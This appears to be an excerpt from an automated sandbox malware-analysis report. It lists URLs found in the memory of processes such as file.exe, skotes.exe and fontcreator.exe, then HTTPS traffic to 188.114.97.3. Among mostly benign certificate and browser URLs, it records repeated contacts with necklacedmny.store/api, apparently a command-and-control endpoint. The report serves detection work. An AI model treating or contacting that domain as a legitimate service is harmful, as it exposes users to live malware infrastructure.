Source: fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://subca.ocsp-certum.com02
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://subca.ocsp-certum.com05
Source: Updater.exe, 0000002E.00000000.2496101011.0000000000DD5000.00000002.00000001.01000000.00000018.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.certum.pl/CPS0
Source: is-5MQTR.tmp.11.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: is-5MQTR.tmp.11.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe, 00000000.00000003.1710460669.0000000005259000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2622025924.0000000005E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1710460669.0000000005259000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2622025924.0000000005E62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1711669897.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641822483.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2640673951.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641188561.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2644211752.0000000005E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000003.1711669897.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641822483.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2640673951.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641188561.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2644211752.0000000005E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1711669897.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641822483.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2640673951.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641188561.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2644211752.0000000005E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000003.1711669897.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641822483.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2640673951.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641188561.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2644211752.0000000005E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 9eba8044e7.exe, 0000003B.00000003.2644211752.0000000005E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jrsoftware.org/
Source: fontcreator.exe, 00000008.00000000.2426191198.0000000000CC1000.00000020.00000001.01000000.0000000E.sdmp, fontcreator.exe, 00000015.00000000.2457565272.00000000009D7000.00000020.00000001.01000000.00000013.sdmp String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://jrsoftware.org0
Source: 9eba8044e7.exe, 0000003B.00000003.2727777421.0000000001763000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2623509191.0000000001771000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2622372839.0000000001763000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2855624046.0000000001763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: 9eba8044e7.exe, 0000003B.00000003.2855624046.0000000001763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/:
Source: file.exe, 00000000.00000003.1784942272.00000000007E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/B
Source: 9eba8044e7.exe, 0000003B.00000003.2727777421.0000000001763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/D
Source: 9eba8044e7.exe, 0000003B.00000003.2603936780.000000000176E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/J
Source: 9eba8044e7.exe, 0000003B.00000003.2725396199.000000000177E000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2720333364.000000000177A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/_
Source: file.exe, 00000000.00000003.1750097386.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1833944782.0000000000768000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1833739536.000000000080A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749526956.0000000000816000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2603936780.000000000176E000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2603984252.000000000177B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.1833739536.000000000080A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749526956.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api-y
Source: file.exe, 00000000.00000003.1784795247.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743147793.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1750097386.00000000007F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiC
Source: 9eba8044e7.exe, 0000003B.00000003.2603936780.000000000176E000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2603984252.000000000177B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiP
Source: file.exe, 00000000.00000003.1710137219.00000000007EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiRy
Source: file.exe, 00000000.00000003.1695973685.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1728112216.000000000080E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1724503778.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1728050949.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1696023139.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1724342554.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1728197051.0000000000811000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1696327370.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1833739536.000000000080A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749526956.0000000000816000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apit
Source: 9eba8044e7.exe, 0000003B.00000003.2780256079.0000000001763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/d
Source: file.exe, 00000000.00000003.1833944782.000000000076F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1785012541.000000000076F000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 9eba8044e7.exe, 0000003B.00000003.2780256079.0000000001763000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2855624046.0000000001763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/api
Source: 9eba8044e7.exe, 0000003B.00000003.2621305300.0000000001763000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2622372839.0000000001763000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/api:w
Source: file.exe, 00000000.00000003.1833944782.000000000076F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1785012541.000000000076F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/apin
Source: fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0D
Source: file.exe, 00000000.00000003.1682248726.000000000527E000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2579336199.0000000005E77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: 9eba8044e7.exe, 0000003B.00000003.2623806913.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 9eba8044e7.exe, 0000003B.00000003.2623806913.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1682306768.0000000005275000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682248726.000000000527C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2579336199.0000000005E77000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2579554260.0000000005E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000003.1682306768.0000000005250000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2579554260.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1682306768.0000000005275000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682248726.000000000527C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2579336199.0000000005E77000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2579554260.0000000005E70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000003.1682306768.0000000005250000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2579554260.0000000005E4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: file.exe, 00000000.00000003.1711669897.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641822483.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2640673951.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641188561.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2644211752.0000000005E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: skotes.exe, 00000007.00000002.4108997518.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000003.3950766153.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2434759693.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000003.2431452405.0000000003580000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000000B.00000003.2498773569.0000000001260000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 0000001A.00000003.2469294133.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000020.00000003.2546020895.0000000002500000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.certum.pl/CPS0
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: is-5MQTR.tmp.11.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: file.exe, 00000000.00000003.1711669897.000000000081D000.00000004.00000020.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641822483.0000000005E2C000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2640673951.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2641188561.0000000005E28000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2644211752.0000000005E32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1682461036.000000000524F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682514952.0000000005238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: fontcreator.exe, 00000008.00000003.2428352317.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, fontcreator.exe, 00000008.00000003.2427979025.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000000.2429939602.0000000000F91000.00000020.00000001.01000000.0000000F.sdmp, fontcreator.tmp, 0000000B.00000000.2436906092.0000000000B8D000.00000020.00000001.01000000.00000011.sdmp, fontcreator.tmp, 0000001A.00000000.2461870950.0000000000C7D000.00000020.00000001.01000000.00000014.sdmp, fontcreator.tmp, 00000020.00000000.2479248509.000000000091D000.00000020.00000001.01000000.00000016.sdmp String found in binary or memory: https://www.innosetup.com/
Source: 9eba8044e7.exe, 0000003B.00000003.2623806913.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 9eba8044e7.exe, 0000003B.00000003.2623806913.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000003.1711401293.000000000533F000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2623806913.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 9eba8044e7.exe, 0000003B.00000003.2623806913.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1711401293.000000000533F000.00000004.00000800.00020000.00000000.sdmp, 9eba8044e7.exe, 0000003B.00000003.2623806913.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: fontcreator.exe, 00000008.00000003.2428352317.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, fontcreator.exe, 00000008.00000003.2427979025.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, fontcreator.tmp, 00000009.00000000.2429939602.0000000000F91000.00000020.00000001.01000000.0000000F.sdmp, fontcreator.tmp, 0000000B.00000000.2436906092.0000000000B8D000.00000020.00000001.01000000.00000011.sdmp, fontcreator.tmp, 0000001A.00000000.2461870950.0000000000C7D000.00000020.00000001.01000000.00000014.sdmp, fontcreator.tmp, 00000020.00000000.2479248509.000000000091D000.00000020.00000001.01000000.00000016.sdmp String found in binary or memory: https://www.remobjects.com/ps
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
